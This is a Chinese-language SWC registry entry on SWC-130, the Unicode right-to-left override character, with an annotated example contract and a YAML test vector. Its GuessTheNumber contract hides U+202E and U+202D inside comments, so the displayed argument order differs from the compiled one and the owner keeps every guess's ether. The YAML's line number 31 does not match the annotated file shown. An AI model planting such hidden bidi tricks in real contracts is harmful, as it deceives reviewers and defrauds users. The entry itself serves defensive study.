SWC智能合约漏洞库


SWC-130/使用从右向左覆盖控制字符(U+202E)

攻击者可以在源代码(通常是注释或字符串字面量)中插入 Unicode 从右向左覆盖字符(U+202E),强制其后的文本以 RTL 方向呈现。这样一来,代码在编辑器或浏览器中显示出来的内容与编译器实际解析的内容不一致——例如函数调用中参数的显示顺序与真实顺序对调——从而误导审阅者对合约真实意图的判断。

CWE漏洞分类

CWE-451:关键信息的用户界面错误表示

整改方案

U+202E 字符极少有合法用途,不应出现在智能合约源代码中(包括注释与字符串字面量)。建议在代码审查和 CI 流程中扫描源码并拒绝 U+202E 及同类双向文本控制字符(U+202A–U+202E、U+2066–U+2069;下面的示例就同时用到了 U+202E 和 U+202D),并使用能够高亮显示不可见 Unicode 字符的编辑器进行审阅。较新的 solc 版本据称会拒绝源码中的双向覆盖字符,请针对实际使用的编译器版本进行确认。

参考文献

示例合约

guess_the_number.sol

/*
 * @source: https://youtu.be/P_Mtd5Fc_3E
 * @author: Shahar Zini
 */
pragma solidity ^0.5.0;

/// @notice Example contract for SWC-130. A Right-To-Left-Override character (U+202E) hidden
///         in a comment inside guess() makes the call to checkAndTransferPrize *display* with
///         its arguments in the order the callee expects, while the compiler sees them swapped.
///         The result is that no guess can ever win and the owner keeps every 1 ether paid in.
/// NOTE(review): this is a deliberately vulnerable exhibit; the code is left byte-identical and
///               only comments were added.
contract GuessTheNumber
{
    uint _secretNumber;      // 0..10, set once in the constructor
    address payable _owner;  // deployer; the only account allowed to call kill()
    event success(string);
    event wrongNumber(string);

    /// @param secretNumber The number players must guess; restricted to 0..10.
    /// @dev Payable so the deployer can seed the apparent prize pool at deployment.
    constructor(uint secretNumber) payable public
    {
        require(secretNumber <= 10);
        _secretNumber = secretNumber;
        _owner = msg.sender;    
    }

    /// @return The contract's current balance, i.e. the apparent prize pool.
    function getValue() view public returns (uint)
    {
        return address(this).balance;
    }

    /// @notice Pay exactly 1 ether to submit the guess `n`.
    /// @dev The call below contains U+202E (right after "The prize") and U+202D (right after
    ///      "p/*"), both inside comments. In most renderers the line therefore *displays* as
    ///          checkAndTransferPrize(/*The prize*/p , n/*guessed number*/, ... msg.sender)
    ///      which matches the callee's (p, n, guesser) parameter order. What the compiler
    ///      actually parses is the comment `/*The prize…rebmun desseug*/`, then the arguments
    ///      `n , p`, then a second comment spanning the line break, then `,msg.sender` — so the
    ///      real argument list is (n, p, msg.sender): the guess lands in parameter `p` and the
    ///      balance lands in parameter `n`.
    ///      Since msg.value == 1 ether is already part of address(this).balance here, `p` is at
    ///      least 10**18 wei, while _secretNumber <= 10; the callee's `n == _secretNumber` check
    ///      can never be true, every guess emits wrongNumber, and the ether stays in the contract
    ///      until the owner withdraws it via kill().
    function guess(uint n) payable public
    {
        require(msg.value == 1 ether);

        uint p = address(this).balance;
        checkAndTransferPrize(/*The prize‮/*rebmun desseug*/n , p/*‭
                /*The user who should benefit */,msg.sender);
    }

    /// @dev Intended contract: send `p` wei to `guesser` when `n` equals the secret number.
    ///      Because of the swapped call in guess(), it actually receives (guess, balance, sender).
    /// @param p Amount to pay out on a correct guess (intended: the prize pool).
    /// @param n The value compared against _secretNumber (intended: the player's guess).
    /// @param guesser Recipient of the payout.
    /// @return Declared but never assigned, so it is always the default `false`.
    function checkAndTransferPrize(uint p, uint n, address payable guesser) internal returns(bool)
    {
        if(n == _secretNumber)
        {
            guesser.transfer(p);
            emit success("You guessed the correct number!");
        }
        else
        {
            emit wrongNumber("You've made an incorrect guess!");
        }
    }

    /// @notice Owner-only: destroy the contract and forward its entire balance — including all
    ///         collected guesses — to the owner.
    function kill() public
    {
        require(msg.sender == _owner);
        selfdestruct(_owner);
    }
}

guess_the_number.yaml

# SWC-130 test vector for guess_the_number.sol.
description: Right-To-Left-Override control character (U+202E) user confusion
issues:
- id: SWC-130
  count: 1
  locations:
  # No bytecode offsets are listed; presumably because the U+202E sits inside a comment
  # and leaves no trace in the compiled bytecode — confirm against the tooling that
  # consumes these vectors.
  - bytecode_offsets: {}
    line_numbers:
      # Line 31 of guess_the_number.sol (counting the leading /* @source */ header as line 1)
      # is the checkAndTransferPrize(...) call in guess(), the line carrying U+202E and U+202D.
      guess_the_number.sol: [31]